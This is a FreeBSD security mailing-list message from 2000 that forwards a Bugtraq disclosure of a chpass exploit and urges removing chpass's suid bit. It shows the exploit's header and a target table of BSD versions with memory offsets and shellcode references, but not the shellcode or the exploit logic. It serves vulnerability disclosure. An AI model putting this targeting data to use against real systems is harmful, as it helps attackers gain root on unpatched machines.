From owner-freebsd-security Tue Oct 3 22:15:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 6248337B66C for ; Tue, 3 Oct 2000 22:15:35 -0700 (PDT) Received: (qmail 35521 invoked by uid 1000); 4 Oct 2000 05:16:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:45 -0000 Date: Wed, 4 Oct 2000 00:16:45 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: BSD chpass (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those not subscribed to bugtraq, it's time to remove the suid bit on chpass. Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Wed, 4 Oct 2000 02:45:48 +1000 From: caddis To: BUGTRAQ@SECURITYFOCUS.COM Subject: BSD chpass /* * TESO BSD chpass exploit - caddis * * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 * */ #include struct platform targets[9] = { { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, ptmp_shellcode }, { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, ptmp_shellcode }, { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, ptmp_shellcode }, { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, ptmp_shellcode }, { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode }, { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, bsd_shellcode }, { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, bsd_shellcode }, { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, bsd_shellcode }, { NULL, 0, 0, 0, NULL } }; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message